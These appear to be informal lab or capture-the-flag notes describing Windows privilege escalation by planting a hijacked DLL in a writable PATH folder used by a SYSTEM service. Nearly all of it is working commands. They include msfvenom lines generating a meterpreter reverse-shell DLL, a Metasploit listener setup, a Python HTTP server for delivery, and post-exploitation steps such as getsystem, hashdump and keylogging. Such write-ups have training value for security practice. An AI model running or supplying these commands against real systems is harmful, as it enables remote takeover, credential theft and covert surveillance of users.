----------------------
Exploitable Service:
C:\Program Files\DeveloperDebugTools\Service\DeveloperService.exe
Write access to this folder, which was in the PATH:
C:\Program Files (x86)\Common Files\Oracle\Java\javapath\
If we can get the evil .dll into that PATH folder.
Then restart the service (or reboot).
It will kick off that .dll with System access!!!
----------------------
Create the dll:
> msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.x.x.x LPORT=4444 -f dll > /root/data/Debug.dll
64 bit option:
> msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.x.x.x LPORT=4444 -f dll > /root/data/Debug.dll
----------------------
Listener:
> msfconsole
> use exploit/multi/handler
> set payload windows/meterpreter/reverse_tcp
> set payload windows/x64/meterpreter/reverse_tcp ..64bit optional
> set LHOST 10.x.x.x
> set LPORT 4444
> exploit
----------------------
Copy to Windows:
> cd data
> python -m SimpleHTTPServer 51001
Windows:
> http://10.102.3.116:51001
.. Also, after downloading.. r.click prop 'unblock' maybe helped?
Works!!
Copy the file here:
C:\Program Files (x86)\Common Files\Oracle\Java\javapath
Rebooted the Windows Server
This kicked off the Service, which ran the evil .dll !!!!!
Watched my "Listener" and picked it up!!!
----------------------
Connected!!
mtp>> sysinfo
mtp>> getuid
mtp>> cd home
mtp>> pwd
mtp>> cd Desktop
met> sessions -i 1
met> getuid
met> getsystem --will switch you to system privs
met> screenshot
met> hashdump
met> help (keylogger, webcam_snap)
met> keyscan_start
met> keyscan_dump ... shows the keyscan!!
meterpreter > cat flag.txt
